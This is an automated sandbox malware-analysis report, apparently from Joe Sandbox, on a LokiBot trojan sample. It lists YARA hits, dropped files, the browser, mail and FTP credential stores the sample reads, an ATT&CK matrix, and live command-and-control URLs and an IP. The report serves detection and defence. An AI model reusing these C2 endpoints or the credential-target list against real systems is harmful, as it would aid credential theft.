                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 4816, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 5828, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00402AC0 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile created: C:\Users\user\AppData\Local\Temp\dehbibhar.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile created: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exe TID: 5528Thread sleep time: -180000s >= -30000s
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_0040290B FindFirstFileW,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeThread delayed: delay time: 60000
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_00406069 GetUserNameW,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 4816, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 5828, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: PopPassword
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: SmtpPassword
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000002.00000002.519895999.0000000000607000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 4816, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dehbibhar.exe PID: 5828, type: MEMORYSTR
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management InstrumentationPath Interception1
                Access Token Manipulation
                1
                Masquerading
                2
                OS Credential Dumping
                11
                Security Software Discovery
                Remote Services1
                Email Collection
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Process Injection
                11
                Virtualization/Sandbox Evasion
                2
                Credentials in Registry
                11
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth1
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                Access Token Manipulation
                Security Account Manager1
                Account Discovery
                SMB/Windows Admin Shares2
                Data from Local System
                Automated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                Process Injection
                NTDS1
                System Owner/User Discovery
                Distributed Component Object Model1
                Clipboard Data
                Scheduled Transfer112
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Remote System Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Obfuscated Files or Information
                Cached Domain Credentials2
                File and Directory Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync5
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                dhGoVvfmul.exe45%VirustotalBrowse
                dhGoVvfmul.exe57%ReversingLabsWin32.Trojan.LokiBot
                dhGoVvfmul.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\dehbibhar.exe46%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\dehbibhar.exe24%ReversingLabsWin32.Trojan.InjectorX
                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)24%ReversingLabsWin32.Trojan.InjectorX
                SourceDetectionScannerLabelLinkDownload
                1.2.dehbibhar.exe.9e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.2.dehbibhar.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                2.0.dehbibhar.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                SourceDetectionScannerLabelLink
                sempersim.su21%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://sempersim.su/gf3/fre.php22%VirustotalBrowse
                http://sempersim.su/gf3/fre.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                sempersim.su
                88.218.168.92
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://sempersim.su/gf3/fre.phptrue
                • 22%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorErrordhGoVvfmul.exefalse
                  high
